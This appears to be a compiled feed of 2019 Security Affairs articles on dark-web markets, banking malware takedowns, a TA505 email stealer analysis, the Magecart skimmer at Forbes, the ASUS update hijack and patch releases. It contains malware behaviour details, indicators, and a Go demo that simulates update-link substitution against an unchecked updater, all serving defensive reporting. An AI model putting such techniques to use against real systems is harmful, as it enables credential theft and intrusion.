What is the difference between the Deep Web and the Dark Web? Considerations about the past, present, and future of the Dark Web.

These are intense days for the Dark Web. Operations conducted by law enforcement agencies led to the arrests of many individuals and the closure of the most popular black marketplaces, several of which had survived for years.

Operators behind the principal black markets made a lot of money; consider the managers of Wall Street Market and Valhalla, recently seized by the feds. These were historic points of aggregation where it was possible to buy drugs, weapons, and any kind of hacking tool.

The icing on the cake was a US study that concluded that the Dark Web is significantly smaller than previously thought. This is nothing new for the experts who study the dark web and its evolution.

Unfortunately, there is too much confusion between the terms deep web and dark web, and many YouTube channels provide wrong information. Misinterpretation, superficiality and sometimes plain profit are the root causes of the confusion. This misinformation is extremely dangerous for kids, the first consumers of videos published on the principal social media platforms. Some videos show that it is very simple to buy drugs securely or explain how to hack a website. By describing these phenomena, some journalists have been labeled “experts on the dark web”.

The Dark Web is just a portion of the Deep Web; accessing it is quite simple and doesn’t require any specific technological skill. It is very easy to access the Tor network or to browse content on other anonymizing networks like I2P.

I started this research in September 2016, when I started writing my book, “The Prison of the Humanity – from the deep web to 4.0 the new digital prisons”.

THE ICEBERG


An iceberg has always been used as a visual representation of the Internet. The visible peak, which represents the smallest part of the iceberg and which many have mistakenly associated with the clear web, is the part reachable by search engines.

Even a child could easily wonder: how can billions of sites visible to internet users represent 5% of the internet itself?

Exactly, how?

The Deep Web is composed of the content of the www that is not indexed by search engines. Try to imagine the site of a provider that offers voice or connectivity services to millions of people, families and companies: its files are not indexable by search engines. Try to think of a banking site with millions of account holders whose transaction history, deposits and investments are kept for years and years without, obviously, being accessible to the entire web population.

Let’s also include all the information produced by IoT devices that are connected online but cannot be accessed, for obvious reasons.

Well, now you can get an idea of the size of the deep web.

THE DARK WEB

What is the Dark Web? It is a non-indexed subset of the Deep Web. Accessible through Tor and other software, its size is incalculable if we rely on imagination. In fact, there could be many .onion sites (the domain extension used inside the Tor network) that are not listed by the Hidden Wiki, a sort of Wikipedia of onion links. Furthermore, each website can have sublevels that could reach infinity.

But these are legends. Let’s get into the merits of my research, which is based on facts and on three years of journalistic navigation of the Dark Web, during which I not only browsed dozens of directories but visited at least 100,000 sites.

My research is based on 100,000 sites that I have personally visited and that can be easily classified into very few categories, which I will explain with brief descriptions:

Information:

The spirit of the Dark Web includes freedom of expression, with portals that give “uncomfortable” or “alternative” news in countries where there is censorship. There are many sites in multiple languages that refer to ideological and collective movements, mostly of anarchist derivation, but there are also movements that promote the defense of online privacy. So there is a lot of counter-information, and the most obvious example that I always bring up is the Bible translated into the languages of the countries where it is strictly prohibited.

Black Markets:

They are the heart of the Dark Web in economic terms. Needless to say, it is impossible to count them or verify their reliability, but they are certainly points of aggregation for several million users and unscrupulous sellers offering drugs, weapons, prescription medicines, bank credentials and personal data of unsuspecting users, steroids and hacking guides.

Empty or non-functional web pages:

Empty pages and typical 404 error pages that pad out the lists of .onion domains in the directories.

Scam

There are many sites that promise the same services as Black Markets, including hitman services, hacking services, money laundering services… but they are only services operated by scammers.

Directories – Search Engines

There are many directories that offer the same links, Hidden Wiki services that offer a guide to the principal links in the Dark Web, but clearly there is only one Hidden Wiki, and the original not only lists the links to the sites but also provides an “obscure and forbidden” encyclopedia service similar to the better-known Wikipedia. Search engines similar to Google are also frequent, but they do not always return the results users hope for.

Child pornography – pornography – violence on animals – gore

There are many pornographic sites on the clear web, but pornography on the dark web takes on gruesome tones. Violence, child abuse, snuff movies and extreme sex are very common. The sites that belong to these categories are divided into different types: chat rooms, traditional websites or service containers. The chats are usually open and there is a remarkable exchange of multimedia files for free. Then there are the forums that require registration; they offer audio/video content or images, and also provide suggestions on how to kill people or how to eat them in ritual cannibalism. Furthermore, there are many child pornography sites on the dark web that point to the largest online sharing platforms, such as Satoshi box or Megaupload, where it is possible to pay to download packages of illegal content.

Websites – Forums

They are normal websites that deal with different topics, including forums that serve as meeting points for users who discuss legal and non-legal issues. There are many blogs that for the most part deal with cybersecurity and the rights of the digital population in terms of consumer protection and privacy.

Honeypots

Many sites belonging to the above categories are in fact traps set up by law enforcement agencies in an attempt to identify criminals. The dark web is full of honeypots.

CONCLUSIONS

Let’s conclude with some statistics on the composition of the Dark Web:

  • Not Working: 45%
  • Scam: 44%
  • Websites – Forums: 6%
  • Child pornography – Gore: 4%
  • Directories – search engines: 0.5%
  • Information: 0.3%
  • Black Markets: 0.2%

At this time it is not possible to determine the exact number of Black Markets; in any case, it is very small. Terrorism is an irrelevant phenomenon in terms of propaganda. It is also impossible to determine the diffusion of honeypots.

The real question is not how big the Dark Web is, but what will happen after the operations conducted by law enforcement.

Who will be its users? Will Black Markets still exist?

Or is the Dark Web itself a honeypot for criminals, anarchists, terrorists and pedophiles?

These doubts are legitimate, given the military origins of the most popular anonymizing network.

About the Author: Livio Varriale

Pierluigi Paganini

(SecurityAffairs – Dark Web, crime)




A joint operation by international police dismantled GozNym gang

A joint effort by law enforcement agencies from six different countries has dismantled the crime gang behind the GozNym banking malware.

GozNym banking malware is considered one of the most dangerous threats to the banking industry; experts estimate it was used to steal nearly $100 million from over 41,000 victims across the globe over the years.

“An unprecedented, international law enforcement operation has dismantled a complex, globally operating and organised cybercrime network.” reads the press release published by Europol. “The criminal network used GozNym malware in an attempt to steal an estimated $100 million from more than 41 000 victims, primarily businesses and their financial institutions.”


The GozNym banking malware was first spotted in April 2015 by researchers from IBM X-Force Research; it combines the best features of the Gozi ISFB and Nymaim malware.

GozNym has been seen targeting banking institutions, credit unions, and retail banks. Among the victims of the GozNym Trojan are 24 financial institutions in North America and organizations in Europe, including a Polish webmail service provider, investment banking and consumer accounts at 17 banks in Poland, and one bank in Portugal.

Now Europol has announced the unprecedented international law enforcement operation that dismantled this complex, globally operating and organised cybercrime network.

Europol, with the help of law enforcement agencies from Bulgaria, Germany, Georgia, Moldova, Ukraine, and the United States, identified ten individuals alleged to be members of the GozNym network.

Five defendants were arrested during several coordinated searches conducted in Bulgaria, Georgia, Moldova, and Ukraine; the remaining ones are Russian citizens and are still on the run, including the developer of the banking malware.

The cybercrime organization has been described by Europol as a highly specialised and international criminal network.

One of the members, who encrypted the GozNym malware to avoid detection by security solutions, was arrested and is being prosecuted in the Republic of Moldova.

Operators behind the GozNym malware used the Avalanche network to spread the malware.

“Bulletproof hosting services were provided to the GozNym criminal network by an administrator of the “Avalanche” network. The Avalanche network provided services to more than 200 cybercriminals, and hosted more than twenty different malware campaigns, including GozNym.” continues the press release published by Europol. “Through the coordinated efforts being announced today, this alleged cybercriminal is now facing prosecution in Ukraine for his role in providing bulletproof hosting services to the GozNym criminal network. The prosecution will be conducted by the Prosecutor General’s Office of Ukraine and the National Police of Ukraine.”

The members of the gang used banking malware to infect victims’ computers and steal their online banking credentials.

“A criminal Indictment returned by a federal grand jury in Pittsburgh, USA charges ten members of the GozNym criminal network with conspiracy to commit the following:

  • infecting victims’ computers with GozNym malware designed to capture victims’ online banking login credentials;
  • using the captured login credentials to fraudulently gain unauthorised access to victims’ online bank accounts;
  • stealing money from victims’ bank accounts and laundering those funds using U.S. and foreign beneficiary bank accounts controlled by the defendants.”

The defendants are well known in the Russian underground; they advertised their specialized technical skills and services in Russian-speaking online criminal forums, through which the leader of the GozNym network recruited them.

“The leader of the GozNym criminal network, along with his technical assistant, are being prosecuted in Georgia by the Prosecutor’s Office of Georgia and the Ministry of Internal Affairs of Georgia.” continues Europol.

The FBI also published an advisory on the GozNym network.

Pierluigi Paganini

(SecurityAffairs – GozNym, malware)


Microsoft renewed its Attack Surface Analyzer, version 2.0 is online

Microsoft has renewed its Attack Surface Analyzer tool to take advantage of modern, cross-platform technologies.

The first version, Attack Surface Analyzer 1.0, was released back in 2012; it aimed at detecting the changes that occur in the Windows operating system during the installation of third-party applications.

The new Analyzer has been released on GitHub and was developed using .NET Core and Electron; these two cross-platform technologies allow it to run on macOS and Linux as well as Windows.

“Attack Surface Analyzer is a Microsoft-developed open source security tool that analyzes the attack surface of a target system and reports on potential security vulnerabilities introduced during the installation of software or system misconfiguration.” reads the README file published by Microsoft.

“Attack Surface Analyzer 2.0 replaces the original Attack Surface Analyzer tool, released publicly in 2012.”


Users of Attack Surface Analyzer can determine the changes to the system attack surface introduced when software is installed and evaluate the risk presented by third-party software.

The tool is able to detect changes to OS components, including the file system (static snapshot and live monitoring available), user accounts, services, network ports, certificates, and the registry (Windows only).

“The core feature of Attack Surface Analyzer is the ability to “diff” an operating system’s security configuration, before and after a software component is installed.” continues Microsoft. “This is important because most installation processes require elevated privileges, and once granted, can lead to unintended system configuration changes.”

The tool reports on potential vulnerabilities introduced during app installation. 

“This tool can play an important role in ensuring that the software you develop or deploy doesn’t adversely affect the operating system security configuration by allowing you to scan for specific types of changes,” reads a blog post published by Microsoft. 

Microsoft pointed out that the tool offers both an Electron GUI and a command line interface. The results of the command line option are written to a local HTML or JSON file, an implementation choice that makes it easy to include the tool in a user’s automated toolchain.

Pierluigi Paganini

(SecurityAffairs – Attack Surface Analyzer, Microsoft)


The stealthy email stealer in the TA505 hacker group’s arsenal

Experts at Yoroi-Cybaze Z-Lab observed a spike in attacks against the banking sector and spotted a new email stealer used by the TA505 hacker group.

Introduction

During the last month, our Threat Intelligence surveillance team spotted increasing evidence of an intensification of operations against the banking sector. In fact, many independent researchers pointed to a particular email attack wave probably related to the known TA505 hacking group, active since 2014 and focused on retail and banking companies. The group is also known for the evasive techniques it has put in place over time to avoid security controls and penetrate corporate perimeters with several kinds of malware, for instance abusing the so-called LOLBins (Living Off The Land Binaries), legitimate programs regularly used by victims, or abusing validly signed payloads.

Figure 1. Attack campaign spotted in the wild.

Investigating and tracking their operations during April and May, we detected an interesting tool delivered to the victim machines. Just after the opening of the malicious documents and the installation of FlawedAmmyy RAT implants, the group deployed a particular credential stealing software, part of their arsenal, revealing details of their recent operation.

Figure 2. Attack campaign spotted in the wild.

Technical Analysis

The piece of malware under analysis was downloaded from “bullettruth[.com/out[.exe” and executed on the victim machines after the infection was established.

Sha256: f3e8f68c31c86d431adea1633c875c32434a42aee5ed70af74af5c5e5aa58883
Threat: Custom Email Stealer
Brief Description: Executable of the email stealer
Ssdeep: 12288:tlICpzmDFPJ+d7SQX5PsTrKjL43vNa77pu:XI+mDFx+d7vcrKv43X
Figure 3: Malware Signature by SLON LTD

Firstly, we noticed this secondary component was well protected against antivirus detection: in fact, the PE file was signed in the first half of May by Sectigo, one of the major Russian Certification Authorities. Analyzing the trust chain, we found the attackers were relying on cryptographic keys issued to a UK company named SLON LTD. At this time, we have no evidence to determine whether or not it was the victim of a previous hack.

A static inspection of the binary revealed that the malware has a quite high entropy level, suggesting it may be packed.

Figure 4: Malware suspicious entropy level

Dynamically executing the malware reveals more information about its behaviour. The malicious executable is essentially an email stealer: its only purpose is to retrieve all the email accounts and passwords present on the victim machine. After running the information gathering routine, the malware sends all the retrieved emails and passwords to its C2:

Figure 5: HTTP POST communication

The interesting thing about the communication with the C2 is that there is no encryption: the harvested data are sent to the C2 in JSON format. Investigating the attacker infrastructure through our Digital Surveillance systems, we retrieved interesting information, such as details of the stolen emails.

In order to retrieve more details about this email stealer, the analysis moved on to debugging and disassembling. As previously mentioned, the malware sample is heavily obfuscated and packed. However, by letting the malware run inside a debugger, we were able to extract its unpacked payload.

Figure 6: Static information about the packed sample (on the left) and the unpacked one (on the right)

As shown in the figure above, the two components have a peculiarity: while the packed sample is compiled with Microsoft Visual C++ version 6.0, the unpacked one is compiled with Microsoft Visual C++ version 8. At this point, we deepened the analysis of the extracted payload. However, we were not able to execute it, because it references many memory addresses of the original one, so we carried on with static analysis of the extracted sample.

As previously described, the malware’s principal purpose is to iterate through the filesystem looking for email accounts. The first step is to check whether the “outlook.exe” process is running and, if so, to kill it: the malware iterates through user processes with the Process32FirstW API and then terminates the process with TerminateProcess:

Figure 7: Outlook process search routine

The extracted payload does not present any other type of code obfuscation; in fact, the C2 server and path are not encoded:

Figure 8: C2 connection routine

The last routine being analyzed is the credential harvesting inside the entire filesystem.

Apart from the routine that searches for the email accounts registered in the Outlook and Thunderbird clients (as shown in Figure 7), there is another one that scans the filesystem for hardcoded extensions; if one of them is found, a reference to the file is kept in the %TEMP% directory. At this point, all the gathered email accounts are sent to the server and the malware erases all traces of itself from the infected machine: it creates a simple batch script that deletes the executable and all traces of the infection.

Figure 9: Autodeletion batch script

Analysis of Exposed Emails

This section shows some statistics about the emails harvested in the attack campaign, recovered during surveillance and hunting operations. We created a graph sorting the most frequent TLD occurrences across all the stolen data.

Figure 10: Distribution of TLD

As seen in the graph above, the most frequent TLD is .com with 193,194 occurrences, followed by .kr with 102,025 occurrences, .cn with 26,160 occurrences, .it with 6,317 occurrences and so on. To better visualize the macro-locations involved in this exposure, we built a heatmap showing the geographical distribution of the top 100 countries referenced in the TLDs.


Figure 11: Geolocation of emails TLD exposure

The heatmap shows the less-affected countries in a greenish color, while the most-affected ones tend toward orange or red. The first thing that emerges from these two distributions is that this specific threat does not seem to be targeted: the diffusion is almost global, with some red or orange zones in the UK, Italy, Republic of Korea, China, Germany, Hungary, Taiwan, Japan, India and Mexico. All these countries exceeded a thousand occurrences.

Conclusion

Nowadays, email accounts are an effective source of revenue for cyber criminals. All this information can be used to spread other malware through phishing campaigns, to perform BEC (Business Email Compromise) attacks, and also to attempt credential stuffing attacks.

Even a simple info-stealer like this one could be a dangerous threat, especially if used by organized groups in conjunction with other malware implants. In fact, as also reported by the independent researcher Germán Fernández Bacian, this email stealer has recently been used by the infamous TA505 hacking group. This link means, with good confidence, that the exposed data, full email accounts in some cases and email contacts in general, are now available to a cyber-criminal group which launched targeted attacks against the banking and retail industries in the recent past.

Technical details, including IoCs and Yara Rules, are available in the analysis published on the Yoroi blog.

https://blog.yoroi.company/research/the-stealthy-email-stealer-in-the-ta505-arsenal/


Pierluigi Paganini

(SecurityAffairs – TA505, malware)

The post The stealthy email stealer in the TA505 hacker group’s arsenal appeared first on Security Affairs.

Magecart hackers inject card Skimmer in Forbes Subscription Site

The Magecart gang made the headlines again, the hackers this time compromised the Forbes magazine subscription website.

The Magecart group is back: this time the hackers injected a skimmer script into the Forbes magazine subscription website.

The malicious traffic was spotted by the security expert Troy Mursch, Chief Research Officer of Bad Packets, on Wednesday.


Magecart hackers installed a malicious JavaScript skimmer on forbesmagazine.com to siphon the payment card data entered into the site by subscribers. Crooks injected obfuscated JavaScript into the HTML code of the payment section; the decoded script is available here.

The expert immediately attempted to report his discovery to Forbes via email, but without success.

The payment page was taken down at around 1400 UTC and it is still offline at the time of writing.

A Forbes spokesperson told El Reg that the company is investigating the incident and that, at this stage, it is not aware of the theft of any customers’ credit card information. Recent subscribers should remain vigilant and check their credit card statements for signs of fraudulent activity.

Forbes was likely the victim of a supply chain attack: Magecart hackers compromised a company that provides services to the media outlet.

During the weekend, the forensic expert Willem de Groot discovered that the records of customers of Picreel, a web marketing software supplier, had been leaked online.

Forbes is one of the customers of Picreel, and Magecart hackers used the leaked data to access Forbes infrastructure and install the skimmer script.

“Last weekend, security researchers surfaced new supply-chain attacks involving Magecart web-skimmers placed on several web-based suppliers, including AdMaxim, CloudCMS, and Picreel. The breaches were part of a large-scale attack that hit a breadth of providers simultaneously intending to access as many websites as possible.” reads the analysis published by RiskIQ.

Thousands of other companies that are customers of Picreel are at risk; the potentially affected domains are listed here.

Security firms have monitored the activities of at least a dozen Magecart groups since 2015. The gangs implant skimming scripts into compromised online stores in order to steal payment card data, but they are quite different from each other.

According to a joint report published by RiskIQ and FlashPoint in March, some groups are more advanced than others. The list of victims of Magecart groups is long and includes several major platforms such as British Airways, Newegg, Ticketmaster, and Feedify.

Recently the Magecart group stole payment card details from the e-commerce system used by colleges and universities in Canada and the US.

Pierluigi Paganini

(SecurityAffairs – Magecart, Forbes)

The post Magecart hackers inject card Skimmer in Forbes Subscription Site appeared first on Security Affairs.

BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor

The BlackTech cyber-espionage group exploited the ASUS update process for WebStorage application to deliver the Plead backdoor.

The cyber espionage group tracked as BlackTech compromised the ASUS update process for WebStorage application to deliver the Plead backdoor.

The BlackTech group was first observed by ESET in July 2018, when it was abusing code-signing certificates stolen from D-Link to distribute the Plead backdoor, which has been in the wild since at least 2012.

According to the experts, the cyber espionage group is highly skilled and most of its victims are in the East Asia region, particularly Taiwan.

At the end of April 2019, experts from ESET observed multiple attempts to deploy the Plead backdoor. In the attacks observed by the researchers, the Plead backdoor was created and executed by a legitimate process named AsusWSPanel.exe, which is associated with the Windows client for a cloud storage service called ASUS WebStorage. The executable file used in the attack is digitally signed by ASUS Cloud Corporation.

Experts noticed that all observed samples of the Plead backdoor had the file name ‘Asus Webstorage Upate.exe.’ Experts discovered that, during the software update process, the AsusWSPanel.exe module of ASUS WebStorage can create files with such filenames.

Threat actors might have had access to the update mechanism, a circumstance that suggests two attack scenarios:

  • Hackers compromised the supply chain of the ASUS WebStorage cloud service;
  • Hackers were in a position to carry out a MITM attack, given that WebStorage binaries are delivered via HTTP during the update process.

Experts believe that the second scenario is more plausible: updates for the ASUS WebStorage software are not provided through a secure connection and the process lacks validation of the downloaded binaries.

“The ASUS WebStorage software is vulnerable to a man-in-the-middle attack (MitM).” reads the advisory published by ESET. “Namely, the software update is requested and transferred using HTTP; once an update is downloaded and ready to execute, the software doesn’t validate its authenticity before execution. Thus, if the update process is intercepted by attackers, they are able to push a malicious update.”

Experts from ESET noticed that most of the affected organizations have routers made by the same vendor and their admin panels are exposed online. It is likely that attackers compromised the routers to carry out a MitM attack.


During the ASUS WebStorage update mechanism, the client sends a request to the server asking for an update; in turn the server responds in XML format, with a guid and a link included in the response. The software then checks whether the installed version is older, based on the information in the guid element, and requests the update binary via the provided link.

“Therefore, attackers could trigger the update by replacing these two elements using their own data. This is the exact scenario we actually observed in the wild. Attackers inserted a new URL, which points to a malicious file at a compromised gov.tw domain,” says ESET.
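To show what the missing checks look like in code, the following Go program is an added example, not ESET’s or ASUS’s code. It models the exchange described above (an XML response carrying a guid and a link) and puts the unchecked client beside a hardened one that refuses non-https links and verifies an ed25519 signature, pinned in the client, before the binary is handed over for execution. The sig element, the key scheme, the host names and the update bytes are all assumptions constructed for the example.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"encoding/base64"
	"encoding/xml"
	"errors"
	"fmt"
	"net/url"
)

// updateResponse: guid and link are the elements the article describes; sig is
// an assumed addition (base64 ed25519 signature over the binary) that a
// verifiable response would need to carry.
type updateResponse struct {
	GUID string `xml:"guid"`
	Link string `xml:"link"`
	Sig  string `xml:"sig"`
}

// fetcher stands in for the HTTP download so the example runs offline (nil = unknown link).
type fetcher func(link string) []byte

var errInsecureTransport = errors.New("update link is not https")
var errBadSignature = errors.New("update signature does not verify")

// insecureUpdate mirrors the behaviour described above: fetch whatever the XML
// names and hand it back for execution without any check.
func insecureUpdate(xmlBody []byte, get fetcher) ([]byte, error) {
	var r updateResponse
	if err := xml.Unmarshal(xmlBody, &r); err != nil {
		return nil, err
	}
	return get(r.Link), nil
}

// secureUpdate refuses non-https links and verifies the vendor signature with a
// public key pinned in the client before returning the binary.
func secureUpdate(xmlBody []byte, get fetcher, pinned ed25519.PublicKey) ([]byte, error) {
	var r updateResponse
	if err := xml.Unmarshal(xmlBody, &r); err != nil {
		return nil, err
	}
	if u, err := url.Parse(r.Link); err != nil || u.Scheme != "https" {
		return nil, errInsecureTransport
	}
	bin := get(r.Link)
	sig, err := base64.StdEncoding.DecodeString(r.Sig)
	if err != nil || !ed25519.Verify(pinned, bin, sig) {
		return nil, errBadSignature
	}
	return bin, nil
}

// buildResponse is the vendor side: sign the binary and emit the XML.
func buildResponse(priv ed25519.PrivateKey, guid, link string, bin []byte) []byte {
	sig := base64.StdEncoding.EncodeToString(ed25519.Sign(priv, bin))
	out, _ := xml.Marshal(updateResponse{GUID: guid, Link: link, Sig: sig})
	return out
}

// demoResult records what each client did with a tampered response (link
// swapped to an http attacker host, then to an https one) and the genuine one.
type demoResult struct {
	InsecureRanMalicious bool
	HTTPRejected         error
	SigRejected          error
	GenuineAccepted      bool
}

// Demo builds a fake vendor, files and responses in memory; every key, link and
// binary here is constructed for this example.
func Demo() (demoResult, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return demoResult{}, err
	}
	genuine, malicious := []byte("genuine-update-bytes"), []byte("attacker-stage1-bytes")
	const good, badHTTP, badHTTPS = "https://update.vendor.example/ws.exe",
		"http://compromised.example/ws.exe", "https://compromised.example/ws.exe"
	files := map[string][]byte{good: genuine, badHTTP: malicious, badHTTPS: malicious}
	get := func(link string) []byte { return files[link] }
	resp := buildResponse(priv, "2.0.0.1", good, genuine)
	swap := func(to string) []byte { return bytes.Replace(resp, []byte(good), []byte(to), 1) }

	var res demoResult
	b, _ := insecureUpdate(swap(badHTTP), get)
	res.InsecureRanMalicious = bytes.Equal(b, malicious)
	_, res.HTTPRejected = secureUpdate(swap(badHTTP), get, pub)
	_, res.SigRejected = secureUpdate(swap(badHTTPS), get, pub)
	b, err = secureUpdate(resp, get, pub)
	res.GenuineAccepted = err == nil && bytes.Equal(b, genuine)
	return res, nil
}

func main() {
	res, err := Demo()
	fmt.Println(res, err)
}
```

The third scenario in Demo is the one that matters for design: moving the update channel to HTTPS alone would not help against an attacker who controls a host with a valid certificate, so the signature check on the downloaded bytes, against a key the client already holds, is the control that actually blocks the link substitution.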

The attackers serve a Plead sample that acts as a first-stage downloader, fetching a fav.ico file from a server whose name mimics the official ASUS WebStorage server. The downloaded file contains a PNG image and data used by the malware, located right after the PNG data.

The second-stage loader writes itself to the Start Menu startup folder to gain persistence. The loader executes shellcode in memory to load the third-stage DLL, the TSCookie.

“We see that supply-chain and man-in-the-middle attacks are used more and more often by various attackers all around the globe.” ESET concludes. “This is why it’s very important for software developers not only to thoroughly monitor their environment for possible intrusions, but also to implement proper update mechanisms in their products that are resistant to MitM attacks.”

Pierluigi Paganini

(SecurityAffairs – Plead Backdoor, Zero-day, BlackTech group)

The post BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor appeared first on Security Affairs.

SAP Security Patch Day for May 2019 fixes many missing authorization checks

SAP released SAP Security Patch Day for May 2019 that includes 8 Security Notes, 5 of which are updates to previously released Notes.

Five Security Notes included in SAP Security Patch Day for May 2019 addressed missing authorization checks in SAP products, including Treasury and Risk Management, Solution Manager and ABAP managed systems, dbpool administration, and Enterprise Financial Services. 

“Today, being the second Tuesday of the month, SAP released May’s Security Notes. This month, there are no critical or Hot News notes published, but there are three High Priority Notes, as well as two other SAP Security Notes affecting SAP Solution Manager (reported by the Onapsis Research Labs).” reads a blog post published by SAP security firm Onapsis. “This month, 50% of the patches are Missing Authorization Checks, which is higher than the average 15%. Even though this is one of the most common vulnerabilities in SAP software.”


SAP also released five Security Notes to address information disclosure vulnerabilities in several products, including BusinessObjects and Solution Manager. 

Another Security Note addresses a privilege escalation issue (CVE-2019-0301) in SAP Identity Management REST Interface Version 2; this is the only Note rated as High priority, while the remaining 12 are rated Medium.

“Under certain conditions, it is possible to request the modification of role or privilege assignments through SAP Identity Management REST Interface Version 2, which would otherwise be restricted only for viewing.” reads the security advisory for the CVE-2019-0301.

This is the most severe flaw; it received a CVSS score of 8.4.

Two flaws received a CVSS score of 6.3: an information disclosure in the BusinessObjects business intelligence platform (CVE-2019-0287), and a missing authorization check in Treasury and Risk Management (CVE-2019-0280).

SAP published updates for Security Notes released in October 2009, September 2010, December 2010, and March 2013.

“A total of 11 Security Notes were published in May and an additional three in late April after last month’s Patch Tuesday, represented in these types: Missing Authorization Checks (the most common type of vulnerability in SAP software), Information Disclosure, Cross-Site Scripting (XSS) and Privilege Escalation.” adds Onapsis.

Pierluigi Paganini

(SecurityAffairs – SAP Security Patch Day for May 2019)

The post SAP Security Patch Day for May 2019 fixes many missing authorization checks appeared first on Security Affairs.

Twitter inadvertently collected and shared iOS location data

Twitter revealed that a bug in its iOS app was the root cause of an inadvertent collection of location data and its sharing with a third party.

A new story of a violation of users’ privacy made the headlines: Twitter revealed that, due to a bug, it collected and shared iOS location data with a third-party advertising company.

Fortunately, only one partner of the micro-blogging firm was involved, and the data collection and sharing occurred only in certain circumstances.

“We have discovered that we were inadvertently collecting and sharing iOS location data with one of our trusted partners in certain circumstances.” reads the security advisory published by Twitter.

“Specifically, if you used more than one account on Twitter for iOS and opted into using the precise location feature in one account, we may have accidentally collected location data when you were using any other account(s) on that same device for which you had not turned on the precise location feature,”

Twitter admitted it failed to remove the location data from the information shared with the trusted advertising partner, which was accessing it during the real-time bidding process.

The company pointed out that the location data it shared could not be used to track individuals because it had implemented technical measures to “fuzz” the information. Twitter explained that the shared data was no more precise than a zip code or city (5km squared).

Twitter did not share users’ handles or other unique account IDs, which means that it was impossible to link the identity of a specific user to a geographic location.

“The partner did not receive data such as your Twitter handle or other unique account IDs that could have compromised your identity on Twitter.” continues the announcement.

“This means that for people using Twitter for iOS who we inadvertently collected location information from, we may also have shared that information with a trusted advertising partner,”

Another piece of good news is that the partner did not retain the data, which was deleted “as part of their normal process.”


Twitter has already fixed the issue and notified all the impacted users of the incident; however, it did not reveal the extent of the incident or for how long it shared the data with its partner.

“We invite you to check your privacy settings to make sure you’re only sharing the data you want to with us. We’re very sorry this happened. We recognize and appreciate the trust you place in us and are committed to earning that trust every day,” concludes Twitter.

Pierluigi Paganini

(SecurityAffairs – privacy, data leak)

The post Twitter inadvertently collected and shared iOS location data appeared first on Security Affairs.

Microsoft Patch Tuesday addresses dangerous RDS flaw that opens to WannaCry-like attacks

Microsoft Patch Tuesday updates for May 2019 address nearly 80 vulnerabilities, including an RDS flaw allowing WannaCry-Like attacks.

Microsoft Patch Tuesday updates for May 2019 address nearly 80 vulnerabilities, including a Windows zero-day flaw and an RDS vulnerability that can be exploited to carry out WannaCry-like attacks.

The zero-day vulnerability addressed by Microsoft Patch Tuesday updates for May 2019 is a privilege escalation flaw related to the way the Windows Error Reporting (WER) system handles files. The vulnerability, tracked as CVE-2019-0863, could be exploited by an attacker with low-privileged access to the targeted system to deliver malware.

“An elevation of privilege vulnerability exists in the way Windows Error Reporting (WER) handles files. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with administrator privileges.” reads the security advisory published by Microsoft.

“To exploit the vulnerability, an attacker must first gain unprivileged execution on a victim system.”

The vulnerability was reported by experts at Palo Alto Networks and by a researcher who goes online by the moniker “Polar Bear.”


Microsoft Patch Tuesday updates for May 2019 also address a remote code execution flaw in Remote Desktop Services (RDS). The flaw, tracked as CVE-2019-0708, can be exploited by an unauthenticated attacker by connecting to the targeted system via the Remote Desktop Protocol (RDP) and sending specially crafted requests.

“A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests.” reads the security advisory published by Microsoft. “This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

“To exploit this vulnerability, an attacker would need to send a specially crafted request to the target system’s Remote Desktop Service via RDP.”

It is important to highlight that the RDP itself is not vulnerable.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities. It can be exploited by an unauthenticated attacker without user interaction, making it possible for malware to spread in an uncontrolled way across target networks.

The obvious precedent is the WannaCry attack.

“This vulnerability is pre-authentication and requires no user interaction. In other words, the vulnerability is ‘wormable’, meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017.” reads a blog post published by Microsoft. “While we have observed no exploitation of this vulnerability, it is highly likely that malicious actors will write an exploit for this vulnerability and incorporate it into their malware.”

The vulnerability doesn’t affect Windows 8 and Windows 10, but earlier versions are exposed to the risk of cyber attacks.

Microsoft Patch Tuesday updates for May 2019 also address vulnerabilities in Windows OS, Internet Explorer, Edge, Microsoft Office, Microsoft Office Services and Web Apps, ChakraCore, .NET Framework, ASP.NET, Skype for Android, Azure DevOps Server, and the NuGet Package Manager.

Microsoft released security updates for Windows 7, Windows Server 2008 R2, and Windows Server 2008. The tech giant has also separately released patches for out-of-support versions of Windows such as Windows 2003 and Windows XP.

18 vulnerabilities have been rated Critical and the rest Important in severity.

Microsoft also advised Windows Server users to block TCP port 3389 and to enable Network Level Authentication, which prevents an unauthenticated attacker from exploiting this vulnerability.

Pierluigi Paganini

(SecurityAffairs – Windows, RDP)

The post Microsoft Patch Tuesday addresses dangerous RDS flaw that opens to WannaCry-like attacks appeared first on Security Affairs.

Adobe patches over 80 flaws in Flash, Acrobat Reader, and Media Encoder

Adobe Patch Tuesday updates for May 2019 address a critical flaw in Flash Player and more than 80 vulnerabilities in Acrobat products.

Adobe Patch Tuesday updates for May 2019 address a total of 84 vulnerabilities in Acrobat and Acrobat Reader products for Windows and macOS.

The tech company addressed many critical vulnerabilities in its products, including heap overflow, buffer error, double free, use-after-free, type confusion, and out-of-bounds write issues that can be exploited to execute arbitrary code on vulnerable systems.

The list of vulnerabilities addressed by Adobe also includes several out-of-bounds read issues that can lead to information disclosure.

The good news is that none of the vulnerabilities patched by Adobe Patch Tuesday updates for May 2019 has been exploited in attacks in the wild. According to the priority ratings assigned by Adobe to the flaws, the risk of exploitation in the near future is low.

Adobe fixed a critical use-after-free vulnerability in Flash Player that can be exploited to execute arbitrary code in the context of the targeted user.

The issue tracked as CVE-2019-7837 affects Windows, macOS, Linux, and Chrome OS versions of the popular software. The vulnerability was reported to Adobe by an anonymous researcher via Trend Micro’s Zero Day Initiative (ZDI).

Adobe also fixed a critical file parsing vulnerability that can lead to remote code execution.


Adobe also released Media Encoder version 13.1, which addresses two security vulnerabilities: a critical issue tracked as CVE-2019-7842 that can lead to remote code execution, and an information disclosure flaw.

Pierluigi Paganini

